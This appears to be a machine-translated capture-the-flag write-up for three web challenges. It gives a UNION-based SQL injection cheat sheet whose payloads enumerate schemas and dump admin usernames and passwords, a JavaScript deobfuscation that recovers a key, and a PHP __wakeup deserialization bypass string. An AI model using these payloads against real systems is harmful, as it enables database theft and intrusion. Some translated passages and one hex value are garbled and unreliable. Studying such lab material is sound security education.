New scenter (SQL Injection Joint Query) |NaNNaN-Batman|unserialize3 Solution

New scenter (SQL Injection Joint Query) |NaNNaN-Batman|unserialize3 Solution

Newscenter

Pre-knowledge

Information_in MySQL Scheme Library

SCHEMATA: SCHEMA_NAME
TABLES: TABLE_SCHEMA, TABLE_NAME
COLUMNS: TBALE_SCHEMA,TABLE_NAME,COLUMN_NAME

UNION Rules in MySQL

1.UNION must consist of two or more SELECT statements separated by the keyword UNION.
2. Each query in UNION must contain the same columns.
3.UNION automatically removes duplicate rows from the query result set.
4. Use precondition: there are display bits on the page.

step

1. Determine the number of columns:

order by n
#Echo is normal when the number of columns is less than n

2. Judging display bits (the following examples are column number 3)

union select 1,2,3

3. Get the name of the database and the user who is currently connected to it

union select 1,2,database()
union select 1,2,user()

4. List all databases

#limit One by one printed library name
union select 1,2,schema_name from information_schema.schemata limit 0,1
#group_concat displays all at once
union select 1,2,group_concat(schema_name) from information_schema.schemata

5. List all tables in (database: test)

#limit One printed field name at a time
union select 1,2,table_name from information_schema.tables where table_schema='test' limit 0,1
#group_concat displays all at once
union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=0x674657374
#Note: Database names can be replaced with hexadecimal strings, which bypasses the single quotation mark limit. (There is also a topic on the NCCF that needs to be bypassed by single quotation marks between 20211126 and 20211127)

6. List all fields in (database: test; table: admin)

#limit Print out one by one
union select 1,2,column_name from information_schema.columns where
table_schema='test' and table_name='admin' limit 0,1
#group_concat displays all at once
union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=0x74657374 and table_name=0x61646d696e

7. List the data in (database: test; table: admin; field: username,passwd)

#limit Print out one by one
union select 1,2,(select username,passwd from test.admin limit 0,1)
#group_concat displays all at once
union select 1,2,(select group_concat(concat(username,0x20,passwd))) from test.admin
#0x20 corresponds to''to make it easy to distinguish between two data

Detailed Title

Enter the title and find that it is a UNION union query in SQL. First construct payload to determine the number of columns:

1' order by n #

Echo error until n=4, so column length is 3.
Construct payload judgment display bits:

union select 1,2,3

List all databases:

1' union select 1,2,group_concat(schema_name) from information_schema.schemata #

Echo as information_schema and news.
List all tables in (database: news):

1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='news' #

Echo as news and secret_table.
List all fields in (database: news; table: secret_table):

1' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='news' and table_name='secret_table' #

The echoes are id and fl4g, apparently flag is in fl4g.
List the data in (database: news; table: secret_table; field: fl4g)

union select 1,2,(select group_concat(concat(fl4g))) from news.secret_table #

Get flag.

NaNNaNNaNNaN-Batman

Pre-knowledge

The eval() function executes a string expression and returns the value of the expression.
The alert() function creates a pop-up window and displays the expression.

Solving Steps

Download the attachment, unzip it, and get a file named web100 without a suffix. It is recommended that you do not rush to add a suffix name. Open it directly in Notepad with the following code:

The purpose of the code is not obvious, but script is relevant. I tried to open it in my browser and found only one input box.

Change eval() to alert() in Notepad to reopen it in the browser:

Organized:

function $()
{
var e=document.getElementById("c").value;
if(e.length==16)
	if(e.match(/^be0f23/)!=null)
		if(e.match(/233ac/)!=null)
			if(e.match(/e98aa$/)!=null)
				if(e.match(/c7be9/)!=null)
				{
					var t=["fl","s_a","i","e}"];
					var n=["a","_h0l","n"];
					var r=["g{","e","_0"];
					var i=["it'","_","n"];
					var s=[t,n,r,i];
					for(var o=0;o<13;++o)
					{
						document.write(s[o%4][0]);
						s[o%4].splice(0,1)
					}
				}
}
document.write('<input id="c"><button onclick=$()>Ok</button>');
delete _

Find five of these judgments:
1. A total of 16 characters
2.Beginning must be be0f23
3. Must contain 233ac and c7be9
4. Must end with e98aa
Constructable payload:be0f233ac7be98aa
Finally, change the alert() of the code back to eval(), and type payload in the submission box to get flag.

unserialize3

Pre-knowledge

php magic method

php Magic Method The following method names are considered magic methods:u construct(), u destruct(), u call(), u callStatic(), u get(), u set(), u isset(), u unset(), u sleep(), u wakeup(), u serialize(), u unserialize(), u toString(), u invoke(), u set_state(), u clone(), u debugInfo().
Be careful:
1. Except u construct(), u destruct(), and u All magic methods except clone() must be declared public, otherwise E_will be issued WARNING. No magic method before PHP 8.0.0 sleep(), u wakeup(), u serialize(), u unserialize(), u set_state() emits diagnostic information.
2. If type declarations are used when defining magic methods, they must be identical to the signatures described in this document, or fatal errors will occur. No diagnostic information will be sent until PHP 8.0.0. However, u construct() and u destruct() cannot declare a return type, otherwise a fatal error will be raised.

_u sleep() and u wakeup()
public __sleep():array
public __wakeup():void

The serialize() function checks for the existence of u The sleep() function, which is called first if it exists.
In contrast, unserialize() checks for the presence of a u wakeup() method. If present, u will be called first wakeup() method that prepares the resources required by the object.
Specific magic methods can be referred to: https://www.php.net/manual/zh/language.oop5.magic.php

_u Vulnerability of wakeup() function

_u The wakeup() vulnerability is related to the entire property value. The execution of wakeup is skipped when the serialized string represents an attribute whose value is greater than the real number of attributes on the object. For example: O:7:'Student': 3:{s:9:'full_name'; s:8:'zhangsan'; s:5:'score'; i:150; s:6:'grades'; a:0:{}} has a number 3 behind the s tuedent class, and the whole 3 indicates that there are three attributes in the Student class.

Detailed Title

Visit the destination web address according to u wakeup() magic method and Title name, you can guess here is used for php deserialization

copy and Complete Code

class xctf
{
	public $flag = '111';
	public function __wakeup()
	{
		exit('bad requests');
	}
}
?code=

We know that unserialize() checks for the presence of a u wakeup() method. If present, u will be called first wakeup() method that prepares the resources required by the object. So we need to bypass u wakeup()
Construct script:

<?php
class xctf
{
	public $flag = '111';
	public function __wakeup()
	{
		exit('bad requests');
	}
}
$a=new xctf();
echo(serialize($a));
?>

Run to get O:4:'xctf': 1:{s:4:'flag'; s:3:'111';} and use u The vulnerability of wakeup(), change 1 to 2, and pass it in as a code value to get flag.

Posted on Sun, 05 Dec 2021 18:06:02 -0500 by zysac